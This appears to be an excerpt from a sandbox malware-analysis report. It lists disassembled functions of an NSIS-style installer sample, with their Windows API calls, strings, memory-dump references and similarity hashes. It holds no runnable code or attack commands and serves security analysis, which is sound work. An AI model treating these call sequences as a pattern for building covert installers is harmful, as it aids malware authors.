                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 3581403547-1792361021
                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                    Strings
                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                    • API String ID: 542301482-1377821865
                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                    • API String ID: 20674999-2124804629
                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                    • String ID: F$N$open
                                                                                    • API String ID: 3928313111-1104729357
                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                    APIs
                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                    • API String ID: 565278875-3368763019
                                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                    APIs
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    Strings
                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                    • API String ID: 1641139501-220328614
                                                                                    • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                    • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                    • API String ID: 3734993849-3206598305
                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                    Strings
                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                    • API String ID: 3294113728-3145124454
                                                                                    • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                    • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426576,759223A0,00000000), ref: 00404FD6
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FE6
